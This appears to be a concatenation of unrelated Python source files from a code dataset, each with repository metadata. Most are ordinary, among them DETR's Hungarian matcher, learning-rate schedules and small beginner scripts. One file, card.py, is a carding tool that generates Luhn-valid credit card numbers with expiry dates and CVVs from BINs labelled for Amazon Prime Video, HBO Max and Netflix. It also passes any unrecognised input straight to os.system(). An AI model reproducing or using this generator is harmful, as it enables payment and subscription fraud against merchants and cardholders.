atom_ind_list = get_atom_ind_of_an_ele(vasprun.atomic_symbols, ele)
spin_up_list.append(sum_pdos(pdos_obj=pdos, atom_ind_list=atom_ind_list, orbital_list=orbital_list, spin_list=[Spin.up]))
if ISPIN == 2:
spin_down_list.append(-1*sum_pdos(pdos_obj=pdos, atom_ind_list=atom_ind_list, orbital_list=orbital_list, spin_list=[Spin.down]))
input_arguments = {"tdos": tdos,
"spin_up_pdos_list": spin_up_list,
"spin_down_pdos_list": spin_down_list,
"projected_ele_list": projected_ele_list,
"ISPIN": 2,
"plot_tdos": True,
"wrt_fermi": True,
"energy_range_wrt_fermi": [-2, 2],
"title": "test"}
save_pdos_data(**input_arguments)
plot_pdos_by_ele(**input_arguments)
| 36.827586 | 167 | 0.640605 |
794646801215762abacb67363f18595932ef05c8 | 4,308 | py | Python | models/matcher.py | xieenze/detr | 13bdf0bf59fead571cd793a01eae50e7620fc6a2 | [
"Apache-2.0"
] | null | null | null | models/matcher.py | xieenze/detr | 13bdf0bf59fead571cd793a01eae50e7620fc6a2 | [
"Apache-2.0"
] | null | null | null | models/matcher.py | xieenze/detr | 13bdf0bf59fead571cd793a01eae50e7620fc6a2 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
Modules to compute the matching cost and solve the corresponding LSAP.
"""
import torch
from scipy.optimize import linear_sum_assignment
from torch import nn
from util.box_ops import box_cxcywh_to_xyxy, generalized_box_iou
from IPython import embed
class HungarianMatcher(nn.Module):
"""This class computes an assignment between the targets and the predictions of the network
For efficiency reasons, the targets don't include the no_object. Because of this, in general,
there are more predictions than targets. In this case, we do a 1-to-1 matching of the best predictions,
while the others are un-matched (and thus treated as non-objects).
"""
def __init__(self, cost_class: float = 1, cost_bbox: float = 1, cost_giou: float = 1):
"""Creates the matcher
Params:
cost_class: This is the relative weight of the classification error in the matching cost
cost_bbox: This is the relative weight of the L1 error of the bounding box coordinates in the matching cost
cost_giou: This is the relative weight of the giou loss of the bounding box in the matching cost
"""
super().__init__()
self.cost_class = cost_class
self.cost_bbox = cost_bbox
self.cost_giou = cost_giou
assert cost_class != 0 or cost_bbox != 0 or cost_giou != 0, "all costs cant be 0"
@torch.no_grad()
def forward(self, outputs, targets):
""" Performs the matching
Params:
outputs: This is a dict that contains at least these entries:
"pred_logits": Tensor of dim [batch_size, num_queries, num_classes] with the classification logits
"pred_boxes": Tensor of dim [batch_size, num_queries, 4] with the predicted box coordinates
targets: This is a list of targets (len(targets) = batch_size), where each target is a dict containing:
"labels": Tensor of dim [num_target_boxes] (where num_target_boxes is the number of ground-truth
objects in the target) containing the class labels
"boxes": Tensor of dim [num_target_boxes, 4] containing the target box coordinates
Returns:
A list of size batch_size, containing tuples of (index_i, index_j) where:
- index_i is the indices of the selected predictions (in order)
- index_j is the indices of the corresponding selected targets (in order)
For each batch element, it holds:
len(index_i) = len(index_j) = min(num_queries, num_target_boxes)
"""
bs, num_queries = outputs["pred_logits"].shape[:2]
# We flatten to compute the cost matrices in a batch
out_prob = outputs["pred_logits"].flatten(0, 1).softmax(-1) # [batch_size * num_queries, num_classes]
out_bbox = outputs["pred_boxes"].flatten(0, 1) # [batch_size * num_queries, 4]
# Also concat the target labels and boxes
tgt_ids = torch.cat([v["labels"] for v in targets])
tgt_bbox = torch.cat([v["boxes"] for v in targets])
        embed(header='matcher')  # debugging breakpoint: opens an interactive IPython shell on every call
        # Compute the classification cost. Contrary to the loss, we don't use the NLL,
        # but approximate it in 1 - proba[target class].
        # The 1 is a constant that doesn't change the matching, it can be omitted.
cost_class = -out_prob[:, tgt_ids]
# Compute the L1 cost between boxes
cost_bbox = torch.cdist(out_bbox, tgt_bbox, p=1)
        # Compute the giou cost between boxes
cost_giou = -generalized_box_iou(box_cxcywh_to_xyxy(out_bbox), box_cxcywh_to_xyxy(tgt_bbox))
# Final cost matrix
C = self.cost_bbox * cost_bbox + self.cost_class * cost_class + self.cost_giou * cost_giou
C = C.view(bs, num_queries, -1).cpu()
sizes = [len(v["boxes"]) for v in targets]
indices = [linear_sum_assignment(c[i]) for i, c in enumerate(C.split(sizes, -1))]
return [(torch.as_tensor(i, dtype=torch.int64), torch.as_tensor(j, dtype=torch.int64)) for i, j in indices]
def build_matcher(args):
return HungarianMatcher(cost_class=args.set_cost_class, cost_bbox=args.set_cost_bbox, cost_giou=args.set_cost_giou)
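# Usage sketch (not part of the original file): shapes and cost weights are
# illustrative only, and it assumes the embed() debugging call in forward() has
# been removed or skipped, since it would otherwise drop into an interactive shell.
if __name__ == "__main__":
    matcher = HungarianMatcher(cost_class=1, cost_bbox=5, cost_giou=2)
    outputs = {
        "pred_logits": torch.randn(2, 100, 92),  # [batch, num_queries, num_classes]
        "pred_boxes": torch.rand(2, 100, 4),     # normalized cxcywh boxes
    }
    targets = [
        {"labels": torch.tensor([3, 7]), "boxes": torch.rand(2, 4)},
        {"labels": torch.tensor([1]), "boxes": torch.rand(1, 4)},
    ]
    print(matcher(outputs, targets))  # one (pred_idx, tgt_idx) pair of index tensors per image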
| 48.404494 | 119 | 0.672238 |
794647a6249abebec76f32cc14d0547932c3ec53 | 158 | py | Python | Operators_pro.py | iceboy07/Python_proj | 4565bfd148722731a6b87ffedc8b6473528a22bb | [
"MIT"
] | null | null | null | Operators_pro.py | iceboy07/Python_proj | 4565bfd148722731a6b87ffedc8b6473528a22bb | [
"MIT"
] | null | null | null | Operators_pro.py | iceboy07/Python_proj | 4565bfd148722731a6b87ffedc8b6473528a22bb | [
"MIT"
] | null | null | null | a=9
b=3
print("a=",a)
print("b=",b)
print("a + b=",a+b)
print("a - b=",a-b)
print("a * b=",a*b)
print("a / b=",a/b)
print("a % b=",a%b)
print("a pow b=",a**b) | 15.8 | 22 | 0.474684 |
794647ad77240580564b1e5059f66cc549053d99 | 557 | py | Python | ex-mundo2/ex060.py | PedroPegado/ex-cursoemvideo | 46751a7238e6a142b639c4cc3acf1759411732d7 | [
"MIT"
] | null | null | null | ex-mundo2/ex060.py | PedroPegado/ex-cursoemvideo | 46751a7238e6a142b639c4cc3acf1759411732d7 | [
"MIT"
] | null | null | null | ex-mundo2/ex060.py | PedroPegado/ex-cursoemvideo | 46751a7238e6a142b639c4cc3acf1759411732d7 | [
"MIT"
] | null | null | null | #import math
#x = int(input('Qual número deseja fatorar? '))
#f = math.factorial(x)
#print(f'O fatorial de {x} é {f}')
num = int(input('Qual número deseja fatorar? '))
c = num
f = 1
print(f'calculando {num}!',end=' = ')
while c > 0:
print(f'{c}', end='')
print(' x ' if c > 1 else ' = ', end='')
f *= c
c -= 1
print(f'{f}')
#num = int(input('Enter a number: '))
#f = 1
#c = num
#while c > 0:
#print(f'{c}',end='')
#print(' x ' if c > 1 else ' = ',end='')
#f *= c
#c -= 1
#print(f'{num} em fatorial passa a ser: {f}!' )
| 19.892857 | 48 | 0.506284 |
794647d7dbdc01e29fcc2b5dd73e98f181109b05 | 3,075 | py | Python | train_utils/lr_schemes.py | maxdel/CipherGAN | 367be620d56a0cdc88a49bcdc5123d5bc5e6f122 | [
"MIT"
] | 131 | 2018-01-15T17:13:44.000Z | 2022-03-01T09:57:40.000Z | train_utils/lr_schemes.py | maxdel/CipherGAN | 367be620d56a0cdc88a49bcdc5123d5bc5e6f122 | [
"MIT"
] | 13 | 2018-06-01T12:40:24.000Z | 2022-02-09T23:26:52.000Z | train_utils/lr_schemes.py | maxdel/CipherGAN | 367be620d56a0cdc88a49bcdc5123d5bc5e6f122 | [
"MIT"
] | 29 | 2018-01-16T11:47:02.000Z | 2022-03-01T10:16:45.000Z | import tensorflow as tf
_LR = dict()
def register(name):
def add_to_dict(fn):
global _LR
_LR[name] = fn
return fn
return add_to_dict
def get_lr(params):
return _LR[params.lr_scheme](params)
@register("constant")
def constant(params):
return params.learning_rate
@register("exp")
def exponential_decay(params, delay=0):
gs = tf.contrib.framework.get_global_step() - delay
return tf.train.exponential_decay(
params.learning_rate,
gs,
params.learning_rate_decay_interval,
params.learning_rate_decay_rate,
staircase=params.staircased)
@register("lin")
def linear_decay(params, delay=0):
gs = tf.contrib.framework.get_global_step() - delay
return (params.learning_rate -
(tf.to_float(gs) /
(params.total_steps - delay)) * params.learning_rate)
@register("delay_exp")
def delayed_exponential_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
return tf.cond(
tf.greater(gs, d), lambda: exponential_decay(params, delay=d),
lambda: params.learning_rate)
@register("delay_lin")
def delayed_linear_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
return tf.cond(
tf.greater(gs, d), lambda: linear_decay(params, delay=d),
lambda: params.learning_rate)
@register("resnet")
def resnet(params):
gs = tf.contrib.framework.get_global_step()
return tf.cond(
tf.less(gs, 60000),
lambda: tf.minimum(0.1 / 10**((tf.to_float(gs) // 20000) - 1), 0.1),
lambda: 0.001)
@register("steps")
def stepped_lr(params):
gs = tf.contrib.framework.get_global_step()
lr = params.lr_values[-1]
for step, value in reversed(list(zip(params.lr_steps, params.lr_values))):
lr = tf.cond(tf.greater(gs, step), lambda: lr, lambda: value)
return lr
@register("warmup_linear_decay")
def warmup_linear_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
warmup_steps = params.warmup_steps
inv_base = tf.exp(tf.log(0.01) / warmup_steps)
inv_decay = inv_base**(warmup_steps - tf.to_float(gs))
return tf.cond(
tf.greater(gs, warmup_steps), lambda: linear_decay(params, delay=d),
lambda: inv_decay * params.learning_rate)
@register("warmup_constant")
def warmup_constant(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
warmup_steps = params.warmup_steps
inv_base = tf.exp(tf.log(0.01) / warmup_steps)
inv_decay = inv_base**(warmup_steps - tf.to_float(gs))
return tf.cond(
tf.greater(gs, warmup_steps), lambda: constant(params),
lambda: inv_decay * params.learning_rate)
@register("warmup_exponential_decay")
def warmup_exponential_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
warmup_steps = params.warmup_steps
inv_base = tf.exp(tf.log(0.01) / warmup_steps)
inv_decay = inv_base**(warmup_steps - tf.to_float(gs))
return tf.cond(
tf.greater(gs, warmup_steps), lambda: exponential_decay(params, delay=d),
lambda: inv_decay * params.learning_rate)
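if __name__ == "__main__":
  # Quick illustrative sketch of the registry above (not part of the original module).
  # The "constant" scheme needs no TF graph state, so a plain namespace carrying the
  # two fields it expects is enough to exercise get_lr().
  from types import SimpleNamespace

  params = SimpleNamespace(lr_scheme="constant", learning_rate=0.1)
  print(get_lr(params))  # -> 0.1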
| 26.282051 | 79 | 0.708943 |
794648069e96afcb9bf659a0b2f81ed33d33e60d | 2,221 | py | Python | card.py | abalesluke/carding | 4961fd6d167bb07795887ff03c6fe85a23452d14 | [
"CC0-1.0"
] | null | null | null | card.py | abalesluke/carding | 4961fd6d167bb07795887ff03c6fe85a23452d14 | [
"CC0-1.0"
] | null | null | null | card.py | abalesluke/carding | 4961fd6d167bb07795887ff03c6fe85a23452d14 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/python3
import random, time, os
#sololearn bin = 5235915354xxxxxx
try:
from colorama import Fore
from credit_card_checker import CreditCardChecker as ccc
f = Fore
r = f.RED
y = f.YELLOW
g = f.GREEN
b = f.BLUE
def menu():
print(f"""{y}
| |
|===============================|
|-------------------------------|
~~~~~[+]{r}By: Anikin Luke{y} [+]~~~~~~
Valid/Live CC-Generator
[1] ===== Amazon Prime Video CC
[2] ===== HBO max CC
[3] ===== Netflix CC
[4] ===== CC-checker(CreditCard-Checker)
[0] ===== Exit
[000] === Shutdown...
-h or help to show this msg
|-------------------------------|
|===============================|
| |""")
def generator(bin):
numbers = '1234567890'
yyyy = ["2022","2023","2024","2025","2026","2027","2028",]
mm = ["01","02","03","04","05","06","07","08","09","10","11","12",]
print("How many cc to generate")
ui = int(input("Enter any Value: "))
amount = 0
while amount != ui:
y_r = random.choices(yyyy)
y_j = ''.join(y_r)
m_r = random.choices(mm)
m_j = ''.join(m_r)
cvv_r = random.choices(list(numbers), k=3)
cvv_j = ''.join(cvv_r)
cc_r = random.choices(list(numbers), k=5)
cc_j = bin+''.join(cc_r)
check = ccc(cc_j).valid()
if check == True:
amount +=1
print(f"{cc_j}|{m_j}|{y_j}|{cvv_j}")
time.sleep(.1)
def main():
menu()
while True:
print(f'{r}┌──({y}Anikin㉿Luke)-[~/Carding]')
ui = input(f"{r}└─>->>{g} ")
if ui == '1':
bin = '45101560210'
generator(bin)
elif ui == '2':
bin = '52215801230'
generator(bin)
elif ui == '3':
bin = '52215800230'
generator(bin)
elif ui == '4':
for i in range(10):
print(f"{y}COMMING SOON!!")
time.sleep(.1)
elif ui == '000':
os.system("sudo shutdown now")
elif ui == '0':
os.system("clear")
break
elif ui =='-h' or ui == 'help':
menu()
else:
os.system(ui)
main()
except ImportError as imerr:
print("Some python modules are/is not installed!\n Enter root password to grant us permission to auto install this required modules!")
os.system('sudo pip3 install colorama; sudo pip3 install credit_card_checker')
| 21.563107 | 135 | 0.529941 |
794648b42f2ef13508e219a55d915416a8d9b950 | 1,054 | py | Python | fedjax/aggregators/__init__.py | alshedivat/fedjax | ff46ba9955f167160353d7be72f6f5e1febee32c | [
"Apache-2.0"
] | 143 | 2020-12-24T03:30:02.000Z | 2022-03-29T04:07:18.000Z | fedjax/aggregators/__init__.py | alshedivat/fedjax | ff46ba9955f167160353d7be72f6f5e1febee32c | [
"Apache-2.0"
] | 14 | 2021-01-08T21:29:17.000Z | 2022-03-07T23:17:23.000Z | fedjax/aggregators/__init__.py | alshedivat/fedjax | ff46ba9955f167160353d7be72f6f5e1febee32c | [
"Apache-2.0"
] | 24 | 2021-01-09T04:39:26.000Z | 2022-03-29T04:07:11.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FedJAX aggregators."""
# Default aggregators.
from fedjax.aggregators.aggregator import Aggregator
from fedjax.aggregators.aggregator import mean_aggregator
# Compression aggregators
from fedjax.aggregators.compression import binary_stochastic_quantize
from fedjax.aggregators.compression import uniform_stochastic_quantize
from fedjax.aggregators.compression import uniform_stochastic_quantize_pytree
from fedjax.aggregators.compression import uniform_stochastic_quantizer
| 42.16 | 77 | 0.816888 |
7946491ca223db24c740732226f26e34b637b45b | 2,395 | py | Python | crypto_notifications.py | stylepatrick/crypto_notifications | 4f269915ea632f8bd4546510e71be03db804001a | [
"MIT"
] | null | null | null | crypto_notifications.py | stylepatrick/crypto_notifications | 4f269915ea632f8bd4546510e71be03db804001a | [
"MIT"
] | null | null | null | crypto_notifications.py | stylepatrick/crypto_notifications | 4f269915ea632f8bd4546510e71be03db804001a | [
"MIT"
] | null | null | null | import requests
import time
from datetime import datetime, timedelta
BITCOIN_PRICE_THRESHOLD = 9000
BITCOIN_API_URL = 'https://api.coinmarketcap.com/v1/ticker/bitcoin/'
IFTTT_WEBHOOKS_URL = 'https://maker.ifttt.com/trigger/{}/with/key/{YOUR-IFTTT-KEY}'
def get_latest_bitcoin_price():
response = requests.get(BITCOIN_API_URL)
response_json = response.json()
return float(response_json[0]['price_usd']) # Convert the price to a floating point number
def get_bitcoin_24percent():
response = requests.get(BITCOIN_API_URL)
response_json = response.json()
return float(response_json[0]['percent_change_24h']) # Convert the price to a floating point number
def get_bitcoin_1percent():
response = requests.get(BITCOIN_API_URL)
response_json = response.json()
return float(response_json[0]['percent_change_1h']) # Convert the price to a floating point number
def post_ifttt_webhook(event, value):
data = {'value1': value} # The payload that will be sent to IFTTT service
ifttt_event_url = IFTTT_WEBHOOKS_URL.format(event) # Inserts our desired event
requests.post(ifttt_event_url, json=data) # Sends a HTTP POST request to the webhook URL
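# For example, post_ifttt_webhook('bitcoin_price_update', 9100.5) would POST the
# JSON payload {"value1": 9100.5} to the 'bitcoin_price_update' event URL built
# from IFTTT_WEBHOOKS_URL above (the event name and value here are illustrative).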
def main():
bitcoin_history = []
while True:
price = get_latest_bitcoin_price()
percent1 = get_bitcoin_1percent();
date = datetime.now()
if percent1 >= 2:
            mes = "BTC price increased <b>" + str(percent1) + "%</b> in the last 1h! " + date.strftime('%d.%m.%Y %H:%M') + ' $' + str(price)
#print(mes)
post_ifttt_webhook('bitcoin_percent_update', mes)
elif percent1 <= -2:
            mes = "BTC price decreased <b>" + str(percent1) + "%</b> in the last 1h! " + date.strftime('%d.%m.%Y %H:%M') + ' $' + str(price)
#print(mes)
post_ifttt_webhook('bitcoin_percent_update', mes)
#Send every day the 24h percent
if datetime.now().hour == 6 and datetime.now().minute == 30 and datetime.now().second == 0:
time.sleep(1)
percent24 = get_bitcoin_24percent()
#print(percent24)
post_ifttt_webhook('bitcoin_price_update', percent24)
# Send an emergency notification
if price < BITCOIN_PRICE_THRESHOLD:
#print('emergency')
post_ifttt_webhook('bitcoin_price_emergency', price)
if __name__ == '__main__':
main() | 40.59322 | 136 | 0.665136 |
7946495b586790537d0d92fecb16f222be81f891 | 16,959 | py | Python | prog-o-meter.py | krishane2018/prog-o-meter | 108356b81a5802864d3a03a3a4a117ff491b2cce | [
"MIT"
] | null | null | null | prog-o-meter.py | krishane2018/prog-o-meter | 108356b81a5802864d3a03a3a4a117ff491b2cce | [
"MIT"
] | null | null | null | prog-o-meter.py | krishane2018/prog-o-meter | 108356b81a5802864d3a03a3a4a117ff491b2cce | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The Prog-o-meter.py program is for tracking progress during a #100DaysofCode challenge (or any other #100DaysofX challenge).
The program gives a graphic overview of ones progress through the challenge, by showing a bar containing 100 fields, showing completed days as colored in, and remaining days as white
Currently, the prog-o-meter only tracks your progress in days, but there are plans for many new features, so stay tuned.
The prog-o-meter is developed as an opensource project, and any contributions are welcome, at https://github.com/lineaba/prog-o-meter
"""
__appname__ = "Prog-o-meter"
__authour__ = "Linea Brink Andersen"
__version__ = "1.0.0"
__license__ = "MIT"
import datetime
try:
import Tkinter as Tk # Python < 3.0
except ImportError:
import tkinter as Tk # Python >= 3.0
class ProgressGUI(object):
"""Class contains all things related to the window displaying the prog-o-meter, including text, buttons and actions linked to buttons.
Attributes:
root: a tkinter root.
filename: the name of the .txt file storing the user's number of days.
username: the name of the user.
        days: the number of days the user has completed.
        GOAL: The number of days the user is trying to complete (hardcoded to 100; a future feature may let the user choose this themselves).
        rectangle_list: a list of all rectangle elements to be displayed on the canvas.
"""
def __init__(self, _days, _filename, _username):
"""Open a Tkinter window showing the prog-o-meter, a greeting text, and a button to add a new day to progress.
Opens a Tkinter window showing the prog-o-meter belonging to the user with the provided username.
Window contains a greetings text, a count of days untill goal, and the graphical prog-o-meter.
Window contains a button, for user to add one new day to their progress.
Args:
_days: number of days currently completed by the user
_filename: name of file storing user's progress
_username: name of user
"""
# Attributes
self.root = Tk.Tk()
self.filename = _filename
self.username = _username
self.days = _days
self.GOAL = 100
self.rectangle_list = []
self.days_remaining = self.GOAL - self.days
self.completion_date = self.get_completion_date(self.days_remaining-1)
# Tkinter instantiation
self.canvas_layout()
self.button_layout()
self.prog_o_meter()
self.progress()
self.root.mainloop()
def canvas_layout(self):
"""Display a Tkinter canvas.
        Creates a 1200x600 px canvas, with a greeting text and a text stating how many days the user has left until they reach the goal.
Attributes:
CANVAS_WIDTH: The width of the canvas is hardcoded to 1200 px.
CANVAS_HEIGHT: The height of the canvas is hardcoded to 600 px.
canvas: The Tkinter canvas widget.
            countdown_text: A text element on the canvas, stating how many days the user has left before reaching their goal.
"""
self.CANVAS_WIDTH = 1200
self.CANVAS_HEIGHT = 600
VERTICAL_TEXT_POSITION = 100
self.canvas = Tk.Canvas(self.root, width = self.CANVAS_WIDTH, height = self.CANVAS_HEIGHT)
self.canvas.pack()
self.canvas.create_text(self.CANVAS_WIDTH/2, VERTICAL_TEXT_POSITION, text = ("".join(("Hello ", self.username))))
self.countdown_text = self.canvas.create_text(self.CANVAS_WIDTH/2, VERTICAL_TEXT_POSITION+40, justify = Tk.CENTER, text = "".join(("You have ", str(self.days_remaining), " days left!\n\n", "If you code everyday, you will be done with this project on ", self.completion_date)))
def button_layout(self):
"""Display a button with the text "1 more day!" on the canvas.
        Creates and displays a button with the text "1 more day!", with the function add_day() as its callback. If the user has already reached their goal, the button is displayed but disabled.
Attributes:
add_day_button: A button with the text "1 more day!", which calls the function add_day
"""
self.add_day_button = Tk.Button(self.root, text = "1 more day!", command = self.add_day)
self.add_day_button.pack()
if self.days >= self.GOAL: # Disable add_day_button if goal have been reached
self.add_day_button.config(state = "disabled")
def prog_o_meter(self):
"""Display a prog-o-meter on the canvas.
        Displays a prog-o-meter made of white rectangles, one rectangle per day in the goal. The rectangles are displayed right up against each other, making them appear as one long rectangle sectioned into days.
There will be 50 pixels from left edge of window to first rectangle in prog-o-meter, and 50 pixels from last rectangle to right edge of window.
Rectangles will be 20 pixels high, and their width will be the CANVAS_WIDTH, minus 100 pixels (distance from right+left edge of window to ends of prog-o-meter) divided by number of days in goal.
"""
LEFT_BOUNDARY = 50
RIGHT_BOUNDARY = 50
RECTANGLE_HEIGHT = 20
RECTANGLE_WIDENESS = (self.CANVAS_WIDTH-(LEFT_BOUNDARY+RIGHT_BOUNDARY))/self.GOAL
for i in range(self.GOAL): # Create a rectangle for each day and add it to the rectangle_list
rectangle = self.canvas.create_rectangle(LEFT_BOUNDARY, self.CANVAS_HEIGHT/2, LEFT_BOUNDARY+RECTANGLE_WIDENESS, (self.CANVAS_HEIGHT/2)+RECTANGLE_HEIGHT, fill = "white")
self.rectangle_list.append(rectangle)
LEFT_BOUNDARY += RECTANGLE_WIDENESS
def progress(self):
"""Fill in rectangles in prog-o-meter, to represent the current progress of user.
Fills in rectangles in prog-o-meter to represent the current progress of user, from left to right.
Completed days will be filled out with a solid color (currently hardcoded to be blue).
Remaining days will remain white.
"""
for i in range(self.days): # Color a rectangle pr. completed day blue (from left to right)
self.canvas.itemconfig(self.rectangle_list[i], fill = "blue")
def get_completion_date(self, days_remaining):
"""Calculate the date at which the challenge will be over.
Args:
days_remaining: number of days remaining in the project
Returns:
The project completion date as a string
"""
today = datetime.date.today()
completion_date = today + datetime.timedelta(days=days_remaining)
if 4 <= completion_date.day <= 20 or 24 <= completion_date.day <= 30: # Set the suffix for the day to 'th' if it is between 4 and 20 or between 24 and 30
suffix = "th"
else: # Otherwise, set the suffix for the day to 'st', 'nd' or 'rd' when the day ends with 1, 2 or 3 respectively.
suffix = ["st", "nd", "rd"][completion_date.day % 10 - 1]
return datetime.date.strftime(completion_date, "%B %d{0}, %Y".format(suffix))
def add_day(self):
"""Fill out one more rectangle in prog-o-meter with color, to represent one more day completed.
        Callback function to add_day_button. Fills out one more rectangle (the left-most white rectangle) with color, to represent another day completed.
        The color will be different from the current-progress color, to make the new day stand out.
(Currently the new-day color is hardcoded to be green, but in the future, user should be able to change this themselves).
"""
self.days += 1
self.days_remaining = self.GOAL - self.days
self.completion_date = self.get_completion_date(self.days_remaining)
self.canvas.itemconfig(self.rectangle_list[self.days-1], fill = "green")
update_days_file(self.filename, self.days)
self.canvas.itemconfig(self.countdown_text, text = "".join(("You have ", str(self.days_remaining), " days left!\n\n", "If you code everyday, you will be done with this project on ", self.completion_date)))
if self.days >=self.GOAL: # Disable add_day_button if goal have been reached
self.add_day_button.config(state = "disabled")
class StartGUI(object):
"""Class contains everything related to starting up the application as a new or returning user.
Attributes:
root: a tkinter root.
choice: The input from the user in the radiobuttons. 1 = returning user, 2 = new user
"""
    def __init__(self):
        """Open a Tkinter window, greeting the user and prompting them to input their status (new/returning user).
        Opens a Tkinter window to determine the status of the user (new/returning).
        Window contains a greeting text, and two radiobuttons for user input (choice: new/returning user).
        Window contains a submit button, for the user to click when the status has been set using the radio-buttons.
"""
# Attributes
self.root = Tk.Tk()
self.choice = Tk.IntVar()
# Tkinter instantiation
self.canvas_layout()
self.input_buttons()
self.root.mainloop()
def canvas_layout(self):
"""Display a Tkinter canvas.
Creates a 300x50 px canvas with a greeting text.
Attributes:
CANVAS_WIDTH: The width of the canvas is hardcoded to 300 px.
CANVAS_HEIGHT: The height of the canvas is hardcoded to 50 px.
canvas: The Tkinter canvas widget.
"""
self.CANVAS_WIDTH = 300
self.CANVAS_HEIGHT = 50
VERTICAL_TEXT_POSITION = 20
self.canvas = Tk.Canvas(self.root, width = self.CANVAS_WIDTH, height = self.CANVAS_HEIGHT)
self.canvas.pack()
self.canvas.create_text(self.CANVAS_WIDTH/2, VERTICAL_TEXT_POSITION, text = "Hello, welcome to the prog-o-meter!")
def input_buttons(self):
"""Display the buttons on the canvas.
Displays a set of two radio buttons, for the user to indicate whether they are a new
or returning user. Window closes when user clicks one of the buttons.
Attributes:
BTTN_WIDTH: The width of the radiobuttons is hardcoded to 18 text units.
"""
BTTN_WIDTH = 18
Tk.Radiobutton(self.root, text = "I already have a meter", variable = self.choice, value = 1, command = self.close_window, indicatoron = 0, width = BTTN_WIDTH).pack(pady = 5)
Tk.Radiobutton(self.root, text = "I don't have a meter yet", variable = self.choice, value = 2, command = self.close_window, indicatoron = 0, width = BTTN_WIDTH).pack(pady = 5)
def close_window(self):
"""Close the Tkinter window."""
self.root.destroy()
def get_state(self):
"""Return the user's choice from radio-buttons.
Returns:
IntVar (1 for returning user, 2 for new user).
"""
return self.choice.get()
class UsernameGUI(object):
"""Class contains everything related to the user providing their name, either to create a new prog-o-meter, or to retrieve a saved one.
Attributes:
root: a tkinter root.
user_type: 1 = returning user, 2 = new user
"""
    def __init__(self, _user_type):
        """Open a Tkinter window, greeting the user and prompting them to input their username.
        Opens a Tkinter window for the user to input their name.
        Window contains a greeting+instruction text, and an entry field (text field) where the user types their name.
        Window contains a submit button, for the user to click when they have typed their name.
        It does not matter if the user types their name with a capital letter, fully capitalized, or in all lower-case letters. The name will always be all lower-case in the name of the text file where the user's data is stored.
        The user's name will be displayed in a greeting in the window instantiated by the ProgressGUI class, and the format of the name there will be exactly as they typed it in this window.
        That means that if the user types "Linea" the first time they use the program, and "linea" the second time, the program will open the same .txt file storing the data both times, but their name will be displayed differently each time.
"""
# Attributes
self.root = Tk.Tk()
self.username = ""
self.user_type = _user_type
# Tkinter instantiation
self.canvas_layout()
self.input_button()
self.root.mainloop()
def canvas_layout(self):
"""Display a Tkinter canvas.
Creates a 300x50 px canvas with a greeting text and an entry widget (input field for text).
Attributes:
CANVAS_WIDTH: The width of the canvas is hardcoded to 300 px.
CANVAS_HEIGHT: The height of the canvas is hardcoded to 50 px.
canvas: The Tkinter canvas widget.
text_entry: A Tkinter text-entry widget (input field for text)
"""
self.CANVAS_WIDTH = 300
self.CANVAS_HEIGHT = 50
self.canvas = Tk.Canvas(self.root, width = self.CANVAS_WIDTH, height = self.CANVAS_HEIGHT)
self.canvas.pack()
self.text_entry = Tk.Entry(self.root)
self.text_entry.pack()
self.text_entry.focus_force()
if self.user_type == 1: # Display appropriate greeting for returning users
self.canvas.create_text(self.CANVAS_WIDTH/2, 20, text = "Good to see you again! Please enter your name")
elif self.user_type == 2: # Display appropriate greeting for new users
            self.canvas.create_text(self.CANVAS_WIDTH/2, 20, text = "Let's get you started! Please enter your name")
    def input_button(self):
        """Display the input button on the canvas.
        Displays a submit button, for the user to click when they have typed in their name.
        When the button is clicked, it stores the input name as username, and then closes the Tkinter window.
Attributes:
submit_button: Button with the text "Submit", which calls the function save_and_close
"""
self.submit_button = Tk.Button(self.root, text = "Submit", command = self.save_and_close)
self.submit_button.pack()
self.root.bind('<Return>', self.save_and_close)
def save_and_close(self, event=None):
"""Save input text as username, then close Tkinter window. """
self.username = self.text_entry.get()
self.root.destroy()
def get_name(self):
"""Return the username. """
return self.username
def update_days_file(_filename, _days):
"""Update the file [username].txt, with the current number of days completed.
Args:
_filename: Name of the file to be updated. Should have format [username].txt (username in all lowercase).
_days: the current number of days completed
"""
days_text = open(_filename, "w")
days_text.write(str(_days))
days_text.close()
def read_days_file(_filename):
"""Read the file [username].txt, to retrieve the number of days completed, from last use.
Args:
_filename: Name of the file to be read. Should have format [username].txt (username in all lowercase).
Returns:
Number of days completed
"""
days_text = open(_filename, "r")
days = days_text.read()
days_text.close()
return days
def main():
    """Main routine to run the prog-o-meter program.
Opens a window, which lets the user choose if they are a new or returning user.
Opens a new window, which lets the user type their name.
    Opens a new window, which shows the user's progress, and how many days remain of the challenge.
"""
start_screen = StartGUI()
user_state = start_screen.get_state()
name_screen = UsernameGUI(user_state)
username = name_screen.get_name()
filename = "".join((username.lower(), ".txt"))
if user_state == 2: #Make a new file for a new user, and set their current progress to 0 days
update_days_file(filename, "0")
days = read_days_file(filename)
days = int(days)
ProgressGUI(days, filename, username)
if __name__ == '__main__':
main()
| 51.23565 | 285 | 0.648741 |
7946497868341e8d158167f99c8ed9e31b10b68d | 67 | py | Python | Chapter04/testscript.py | PacktPublishing/Practical-Network-Automation | fa0e7e81869162fe578cf85166fdccca2acdd418 | [
"MIT"
] | 20 | 2017-12-06T10:53:01.000Z | 2022-02-28T05:13:09.000Z | Chapter04/testscript.py | larisk8ter/Practical-Network-Automation | fa0e7e81869162fe578cf85166fdccca2acdd418 | [
"MIT"
] | null | null | null | Chapter04/testscript.py | larisk8ter/Practical-Network-Automation | fa0e7e81869162fe578cf85166fdccca2acdd418 | [
"MIT"
] | 16 | 2018-02-19T16:16:00.000Z | 2022-02-24T17:06:19.000Z | print('Content-Type: text/plain')
print('')
print('Hello, world!')
| 16.75 | 33 | 0.671642 |
